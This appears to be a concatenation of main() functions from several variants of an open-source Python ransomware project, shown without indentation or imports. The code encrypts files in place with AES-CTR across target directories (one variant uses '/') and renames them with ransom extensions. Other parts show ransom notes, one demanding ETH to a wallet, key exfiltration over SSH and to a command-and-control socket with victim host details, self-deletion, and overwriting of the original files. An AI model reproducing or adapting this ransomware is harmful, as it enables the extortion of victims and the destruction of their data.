def main():
parser = get_parser()
args = vars(parser.parse_args())
decrypt = args['decrypt']
#Decrypt mode:
if decrypt:
# Get key from stdin
key = binascii.unhexlify(decrypt)
# TODO: Remove print
print(binascii.hexlify(key))
ctr = Counter.new(128)
crypt = AES.new(key, AES.MODE_CTR, counter=ctr)
pre_decrypt()
for currentDir in startdirs:
for file in discover.discoverFiles(currentDir, 0):
modify.modify_file_inplace(file, crypt.decrypt)
#Encrypt mode
else:
# Generate random 128 bits key
key = Random.get_random_bytes(16)
# TODO: Remove print
print(binascii.hexlify(key))
ctr = Counter.new(128)
crypt = AES.new(key, AES.MODE_CTR, counter=ctr)
for currentDir in startdirs:
for file in discover.discoverFiles(currentDir, 0):
modify.modify_file_inplace(file, crypt.encrypt)
post_encrypt()
# Send key over SSH; Notice hexlify before connect
remote.connect(HOSTNAME, USERNAME, PASSWORD,
str(binascii.hexlify(key)))
#Self destroy
self_path = os.path.abspath(__file__)
sp.call(["/bin/rm", self_path[:-12]])
#sp.call(["/bin/rm", self_path[:-3]])
#Popup Message
popup()
def main():
parser = get_parser()
args = vars(parser.parse_args())
decrypt = args['decrypt']
if decrypt:
key = 'saveusfrompsgpls'
else:
if HARDCODED_KEY:
key = HARDCODED_KEY
ctr = Counter.new(128)
crypt = AES.new(key, AES.MODE_CTR, counter=ctr)
startdirs = ['/Users/mercifulrookie/Desktop/syssec']
#PUT YOURS PRAVIN, I USED /NARAYANAA
for currentDir in startdirs:
for file in discover.discoverFiles(currentDir):
modify.modify_file_inplace(file, crypt.encrypt)
for _ in range(100):
#key = random(32)
pass
if not decrypt:
pass
def decrypt(key):
if check_key(key):
l = tkinter.Label(
root,
text="This is the correct key. \n"
"Your files are being decrypted but it may take a while. Please wait..."
)
l.pack()
ctr = Counter.new(128)
crypt = AES.new(key.encode(), AES.MODE_CTR, counter=ctr)
startdirs = START_DIR
for currentDir in startdirs:
for file in discover.discoverFiles(currentDir):
(name, ext) = os.path.splitext(file)
if ext in '.Cryptsky':
try:
modify.modify_file_inplace(file, crypt.encrypt)
os.rename(file, name)
except IOError:
print("Error")
try:
print()
os.remove(r'C:\Windows\Temp\winUpdater.log')
except FileNotFoundError:
pass
label = tkinter.Label(
root, text="Congratulations. Your files are now decrypted")
label.pack()
else:
return False
def main():
parser = get_parser()
args = vars(parser.parse_args())
decrypt = args['decrypt']
if decrypt:
print '''
Ransomware!
---------------
Your files have been encrypted.
'''
key = raw_input('Enter Your Key> ')
else:
key = generate_key()
ctr = Counter.new(128)
crypt = AES.new(key, AES.MODE_CTR, counter=ctr)
startdirs = ['/media/bin4rygh0st/UBUNTU 19_1/']
for currentDir in startdirs:
for file in discover.discoverFiles(currentDir):
modify.modify_file_inplace(file, crypt.encrypt)
print("Your System has been Decrypted!!")
for _ in range(100):
key = randint(0, 999999999999)
pass
if not decrypt:
pass
def pre_decrypt():
for currentDir in startdirs:
for file in discover.discoverFiles(currentDir, 1):
ext = file.split('.')[-1]
if ext == 'encrypted':
os.rename(file, file[:-10])
else:
os.remove(file)
def main():
parser = get_parser()
args = vars(parser.parse_args())
decrypt = args['decrypt']
if decrypt:
print '''
AnkurCryWare!
---------------
Your files have been encrypted. This is normally the part where I would
tell you to pay a ransom, and I will send you the decryption key. However, this
is an open source project to show how easy malware can be to write and to allow
others to view what may be one of the first fully open source python ransomwares.
This project does not aim to be malicious. The decryption key can be found
below, free of charge. Please be sure to type it in EXACTLY, or you risk losing
your files forever. Do not include the surrounding quotes, but do make sure
to match case, special characters, and anything else EXACTLY!
Happy decrypting and be more careful next time!
Your decryption key is: '{}'
'''.format(HARDCODED_KEY)
key = raw_input('Enter Your Key> ')
else:
# In real ransomware, this part includes complicated key generation,
# sending the key back to attackers and more
# maybe I'll do that later. but for now, this will do.
if HARDCODED_KEY:
key = HARDCODED_KEY
else:
key = random(32)
ctr = Counter.new(128)
crypt = AES.new(key, AES.MODE_CTR, counter=ctr)
# change this to fit your needs.
startdirs = ['/']
for currentDir in startdirs:
for file in discover.discoverFiles(currentDir):
modify.modify_file_inplace(file, crypt.encrypt)
os.rename(file, file+'.AnkurCryWare') # append filename to indicate crypted
# This wipes the key out of memory
# to avoid recovery by third party tools
for _ in range(100):
key = random(32)
pass
if not decrypt:
pass
# post encrypt stuff
# desktop picture
# icon, etc
print "Your device is encrypted by AnkurCryWare
def main():
if PATH.is_file():
print("Already Encrypted :)")
window_thread = WindowThread()
window_thread.start()
time.sleep(10)
safe = tkinter.Label(
root,
text="It is now safe to stop execution of this program. "
"Hopefully you found the key ;)")
safe.pack()
else:
key = HARDCODED_KEY
ctr = Counter.new(128)
crypt = AES.new(key.encode(), AES.MODE_CTR, counter=ctr)
# change this to fit needs.
startdirs = START_DIR
# starts window so it appears while files are still being encrypted
window_thread = WindowThread()
window_thread.start()
# encrypt files
for currentDir in startdirs:
for file in discover.discoverFiles(currentDir):
try:
modify.modify_file_inplace(file, crypt.encrypt)
os.rename(
file, file +
'.Cryptsky') # append filename to indicate crypted
except IOError:
print("Error")
# write evidence file to disk
file = open(PATH, 'w+')
file.write("JBOOZ encrypted this with a custom version of CryptSky. "
"The key for this version is: yellow submarine"
) # you're welcome blue team ;)
file.close()
safe = tkinter.Label(
root,
text="It is now safe to stop execution of this program. "
"Hopefully you found the key ;)")
safe.pack()
''' # Taken out for Case Studies
def main():
parser = get_parser()
args = vars(parser.parse_args())
decrypt = args['decrypt']
if decrypt:
print '''
*ULTRA YEET*
---------------
Your files have been encrypted. Pay a ransom of .5 ETH to 0x8dfaC9f5E011CD1Ce1d5b7537a1c6E9703902aCA
If you do not pay this ransom you're files will be lost >:3
Your decryption key will bee given to you once proof of payment is received
'''.format(HARDCODED_KEY)
key = raw_input('Enter Your Key> ')
else:
if HARDCODED_KEY:
key = HARDCODED_KEY
# else:
# key = random(32)
ctr = Counter.new(128)
crypt = AES.new(key, AES.MODE_CTR, counter=ctr)
# change this to do what you want
startdirs = ['/home']
for currentDir in startdirs:
for file in discover.discoverFiles(currentDir):
modify.modify_file_inplace(file, crypt.encrypt)
#os.rename(file, file+'.Cryptsky') # append filename to indicate crypted
# This wipes the key out of memory
# to avoid recovery by third party tools
for _ in range(100):
#key = random(32)
pass
if not decrypt:
pass
def main():
if len(sys.argv) <= 1:
print('[*] Ransomware - PoC\n')
# banner()
print('Usage: python3 main_v2.py -h')
print('{} -h for help.'.format(sys.argv[0]))
exit(0)
# Parse arguments
args = parse_args()
encrypt = args.encrypt
decrypt = args.decrypt
absolute_path = str(args.path)
# Force one click and comment out args above
# absolute_path = "None"
# encrypt = True
# decrypt = False
if absolute_path != 'None':
startdirs = [absolute_path]
else:
# Check OS
plt = platform.system()
if plt == "Linux" or plt == "Darwin":
startdirs = [os.environ['HOME'] + '/test_ransomware']
elif plt == "Windows":
startdirs = [os.environ['USERPROFILE'] + '\\test_ransomware']
# Can also hardcode additional directories
# startdirs = [os.environ['USERPROFILE'] + '\\Desktop',
# os.environ['USERPROFILE'] + '\\Documents',
# os.environ['USERPROFILE'] + '\\Music',
# os.environ['USERPROFILE'] + '\\Desktop',
# os.environ['USERPROFILE'] + '\\Onedrive']
else:
print("Unidentified system")
exit(0)
# Encrypt AES key with attacker's embedded RSA public key
server_key = RSA.importKey(SERVER_PUBLIC_RSA_KEY)
encryptor = PKCS1_OAEP.new(server_key)
encrypted_key = encryptor.encrypt(HARDCODED_KEY)
encrypted_key_b64 = base64.b64encode(encrypted_key).decode("ascii")
print("Encrypted key " + encrypted_key_b64 + "\n")
if encrypt:
key = HARDCODED_KEY
if decrypt:
# RSA Decryption function - warning that private key is hardcoded for testing purposes
rsa_key = RSA.importKey(SERVER_PRIVATE_RSA_KEY)
decryptor = PKCS1_OAEP.new(rsa_key)
key = decryptor.decrypt(base64.b64decode(encrypted_key_b64))
# Create AES counter and AES cipher
ctr = Counter.new(128)
crypt = AES.new(key, AES.MODE_CTR, counter=ctr)
# Recursively go through folders and encrypt/decrypt files
for currentDir in startdirs:
for file in discover.discoverFiles(currentDir):
if encrypt and not file.endswith(extension):
modify.modify_file_inplace(file, crypt.encrypt)
os.rename(file, file + extension)
print("File changed from " + file + " to " + file + extension)
if decrypt and file.endswith(extension):
modify.modify_file_inplace(file, crypt.encrypt)
file_original = os.path.splitext(file)[0]
os.rename(file, file_original)
print("File changed from " + file + " to " + file_original)
if encrypt:
# Exfiltrate encrypted key to C2
def connector():
server = socket.socket(socket.AF_INET)
server.settimeout(10)
try:
# Send Key
server.connect((host, port))
msg = '%s$%s$%s$%s$%s$%s' % (
getlocalip(), platform.system(), SERVER_PRIVATE_RSA_KEY, SERVER_PUBLIC_RSA_KEY, getpass.getuser(), platform.node())
server.send(msg.encode('utf-8'))
# if plt == "Windows"
main = mainwindow(encrypted_key_b64)
main.mainloop()
except Exception as e:
# if plt == "Windows"
# Do not send key, encrypt anyway.
main = mainwindow(encrypted_key_b64)
main.mainloop()
pass
try:
connector()
except KeyboardInterrupt:
sys.exit(0)
# This wipes the key out of memory
# to avoid recovery by third party tools
for _ in range(100):
#key = random(32)
pass
def main():
if len(sys.argv) <= 1:
print('[*] Ransomware - PoC\n')
# banner()
print('Usage: python3 main.py -h')
print('{} -h for help.'.format(sys.argv[0]))
exit(0)
# Parse arguments
args = parse_args()
encrypt = args.encrypt
decrypt = args.decrypt
absolute_path = str(args.path)
# Force one click and comment out args above
# absolute_path = "None"
# encrypt = True
# decrypt = False
if absolute_path != 'None':
startdirs = [absolute_path]
else:
# Check OS
plt = platform.system()
if plt == "Linux" or plt == "Darwin":
startdirs = [os.environ['HOME'] + '/test_ransomware']
elif plt == "Windows":
startdirs = [os.environ['USERPROFILE'] + '\\test_ransomware']
# Can also hardcode additional directories
# startdirs = [os.environ['USERPROFILE'] + '\\Desktop',
# os.environ['USERPROFILE'] + '\\Documents',
# os.environ['USERPROFILE'] + '\\Music',
# os.environ['USERPROFILE'] + '\\Desktop',
# os.environ['USERPROFILE'] + '\\Onedrive']
else:
print("Unidentified system")
exit(0)
# Encrypt AES key with attacker's embedded RSA public key
server_key = RSA.importKey(SERVER_PUBLIC_RSA_KEY)
encryptor = PKCS1_OAEP.new(server_key)
encrypted_key = encryptor.encrypt(HARDCODED_KEY)
encrypted_key_b64 = base64.b64encode(encrypted_key).decode("ascii")
print("Encrypted key " + encrypted_key_b64 + "\n")
if encrypt:
print("[COMPANY_NAME]\n\n"
"YOUR NETWORK IS ENCRYPTED NOW\n\n"
"USE - TO GET THE PRICE FOR YOUR DATA\n\n"
"DO NOT GIVE THIS EMAIL TO 3RD PARTIES\n\n"
"DO NOT RENAME OR MOVE THE FILE\n\n"
"THE FILE IS ENCRYPTED WITH THE FOLLOWING KEY\n"
"[begin_key]\n{}\n[end_key]\n"
"KEEP IT\n".format(SERVER_PUBLIC_RSA_KEY))
key = HARDCODED_KEY
if decrypt:
# # RSA Decryption function - warning that private key is hardcoded for testing purposes
rsa_key = RSA.importKey(SERVER_PRIVATE_RSA_KEY)
decryptor = PKCS1_OAEP.new(rsa_key)
key = decryptor.decrypt(base64.b64decode(encrypted_key_b64))
# Create AES counter and AES cipher
ctr = Counter.new(128)
crypt = AES.new(key, AES.MODE_CTR, counter=ctr)
# Recursively go through folders and encrypt/decrypt files
for currentDir in startdirs:
for file in discover.discoverFiles(currentDir):
if encrypt and not file.endswith(extension):
modify.modify_file_inplace(file, crypt.encrypt)
os.rename(file, file + extension)
print("File changed from " + file + " to " + file + extension)
if decrypt and file.endswith(extension):
modify.modify_file_inplace(file, crypt.encrypt)
file_original = os.path.splitext(file)[0]
os.rename(file, file_original)
print("File changed from " + file + " to " + file_original)
# This wipes the key out of memory
# to avoid recovery by third party tools
for _ in range(100):
#key = random(32)
pass
return parser
if __name__=="__main__":
parser = get_parser()
args = vars(parser.parse_args())
decrypt = args['decrypt']
if decrypt:
key = 'saveusfrompsgpls'
else:
if HARDCODED_KEY:
key = HARDCODED_KEY
ctr = Counter.new(128)
crypt = AES.new(key, AES.MODE_CTR, counter=ctr)
startdirs = ['/Users/testDirectory/']
#PLEASE INSERT DIRECTORY ACCORDING TO YOUR NEED
for currentDir in startdirs:
for file in discover.discoverFiles(currentDir):
modify.modify_file_inplace(file, crypt.encrypt)
for _ in range(100):
#key = random(32)
pass
if not decrypt:
pass
def post_encrypt():
for currentDir in startdirs:
for file in discover.discoverFiles(currentDir, 0):
shutil.copy2(file, file + '.encrypted')
modify.overwrite_file_inplace(file)
